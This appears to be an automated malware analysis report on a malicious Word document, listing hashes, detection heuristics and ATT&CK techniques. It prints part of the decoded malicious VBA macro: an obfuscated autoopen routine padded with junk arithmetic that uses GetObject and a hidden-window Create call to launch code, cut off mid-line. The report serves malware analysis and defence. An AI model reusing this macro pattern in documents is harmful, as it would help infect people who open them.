Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 32c63778eceb9520…

MALICIOUS

Office (OLE)

167.0 KB Created: 2019-03-22 07:55:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: b353427faca3f19dabbb46bb85c24098 SHA-1: 5c3193d36f55b2e375a344ff55ec2d8c7e0b8640 SHA-256: 32c63778eceb95204b5ee4e42ad9f1729baf3a310cbefe442e9498c79079d9dc
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and uses a GetObject call, indicating an attempt to execute code. The ClamAV detection 'Doc.Malware.Sagent-6905131-0' further supports its malicious nature. The VBA script itself is heavily obfuscated, but the presence of the autoopen macro and GetObject call strongly suggests it's designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Malware.Sagent-6905131-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6905131-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16681 bytes
SHA-256: 2b91d7f22d6448ddcc7d0a3d52ef8930c8f69253501fb1f28048e73d8c48c06f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FDQQAQU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QAwoBA"
Attribute VB_Base = "0{7789F2E6-62A2-4646-A3C3-723DE1135562}{99993612-0FDF-4C24-A1FA-7178E3EF96CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "tUDAGcB"
Sub autoopen()
On Error Resume Next
   If GQXAA4X = hUZAZ_ Then
   Z1kGD__ = CLng(GUDA_Q)
   i_QAUcA = (475094571 + Round(IAcZQACA * Tan(847534544 / Chr(387364199 / CDbl(CU1AZQGA) * wGBcAB / CDbl(787278656)))) * 316603097 * Atn(506004067 / Oct(185768600) - 447858864 * Int(P14Aww)) * (299926762 - Atn(pAUA4B)))
   ooGck1GQ = Int(TQoA1AU - tA_Bo_Qo - 949747137 * Int(590024526))
End If
   If zBBAABAD = NQcDcA Then
   AZ1BwAA = CLng(DQAAAD)
   vX_AABB = (428436593 + Round(zUwQAZQ * Tan(697033302 / Chr(928121779 / CDbl(SXkcABB) * AAcAAQ / CDbl(367376090)))) * 191273810 * Atn(91136492 / Oct(680070942) - 743255129 * Int(EAGCQA)) * (761414307 - Atn(XDwQcDA)))
   zUAQBUZ_ = Int(S4AoAw - PGAA1A_U - 616683060 * Int(510362690))
End If
   If t4AGB44 = SAcDwkU Then
   oUABAo = CLng(QAoAAQA)
   FDUocX = (470169163 + Round(oZ__AQD * Tan(760713983 / Chr(862052139 / CDbl(BXAAA1) * iAAwAAx1 / CDbl(631938304)))) * 241148997 * Atn(816517910 / Oct(194808809) - 781847182 * Int(FoAB4DGB)) * (917613214 - Atn(CCAAQGCQ)))
   h1Q1UwAQ = Int(Z1XCDA_A - twZCkD - 260656822 * Int(487749829))
End If
Set QZG4Dc = GetObject(QAwoBA.Tag + QAwoBA.dc_ADQQ + QAwoBA.Tag)
   If ADAxZX = BwAAxB1 Then
   TQAcAUCB = CLng(nAkBA_BA)
   uUAAkcU = (948604921 + Round(OU4GAo * Tan(381966661 / Chr(154519126 / CDbl(SXAU1BAU) * JXUACGA / CDbl(380013627)))) * 865188282 * Atn(270924934 / Oct(663937777) - 2722352 * Int(bDXAAQD)) * (676066561 - Atn(HUowkAA)))
   mBAUcUwU = Int(a1DGXo - Y_wZZADZ - 244949078 * Int(768778317))
End If
   If Dx4ZAQA = nAwwAU Then
   YkACAkB = CLng(owQoAAA)
   hU_CUCUw = (710488077 + Round(zkAoUAD * Tan(714814942 / Chr(613906231 / CDbl(mAAAwAAx) * zAAUAZAU / CDbl(232495916)))) * 690945694 * Atn(400895268 / Oct(370287543) - 508487259 * Int(pAZ_XUAQ)) * (729718886 - Atn(HAAQAG)))
   w_D_ZADA = Int(aDCAAUx - pkAkAAo - 366394389 * Int(85437247))
End If
   If zDQXAB = iAUAAD Then
   Z4ABUDXA = CLng(tGDBCD)
   LAw1AcA = (677379943 + Round(iAoUBZ * Tan(123238215 / Chr(13114302 / CDbl(ZAo_D4CA) * tAXABA / CDbl(641106669)))) * 199320602 * Atn(347689828 / Oct(854140575) - 569849350 * Int(v_GA_ABA)) * (926084038 - Atn(CBAACAxA)))
   VAccBko = Int(hk_CccU - FAACU1o - 275192518 * Int(465985620))
End If
QZG4Dc.ShowWindow = 653418 - 653418
   If uUAUDBGA = DAwADwA Then
   uB1AAAAQ = CLng(fwDAUC)
   O_AAAA = (706417597 + Round(MQCAZ1Aw * Tan(407704938 / Chr(602440240 / CDbl(i_QADA) * tQQAD_B1 / CDbl(846612236)))) * 805320179 * Atn(496467376 / Oct(212091178) - 337618206 * Int(zUADCAA)) * (289361389 - Atn(tGxAAG)))
   FxUcADA = Int(U4k1AG - vAQAADA_ - 743541609 * Int(229178934))
End If
   If OAU_AcZ_ = ooAAw_ Then
   MUxA4k = CLng(OoA_BQ)
   zAAkQA1 = (324761347 + Round(loGZAAA * Tan(50991180 / Chr(525461008 / CDbl(FA4cAGAA) * NoAAZAD / CDbl(473736356)))) * 437955870 * Atn(100832857 / Oct(703244509) - 354457907 * Int(fAQQBUQ)) * (993878222 - Atn(t4_AAkGA)))
   YxCDBAGB = Int(GQAXDx - iUUAAC - 276669998 * Int(893179218))
End If
   If HXkACwoA = SUCACAAD Then
   CcBAX1A = CLng(hGAA44AG)
   jA_XBkG = (377038642 + Round(KAwoUGA * Tan(360203537 / Chr(368232154 / CDbl(IkocAAD) * vZwAGBB / CDbl(809368170)))) * 259953767 * Atn(625990650 / Oct(530014528) - 901692812 * Int(hUAAAC)) * (439904732 - Atn(Lc_C4X)))
   iAAAUAAX = Int(SDADQQ - iAUXDw - 226450403 * Int(197576277))
End If
GetObject(QAwoBA.Tag + QAwoBA.ZXUA4c + QAwoBA.Tag). _
Create QAwoBA.Tag + QAwoBA.iABABo14 + QAwoBA.Tag + QAwoBA.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.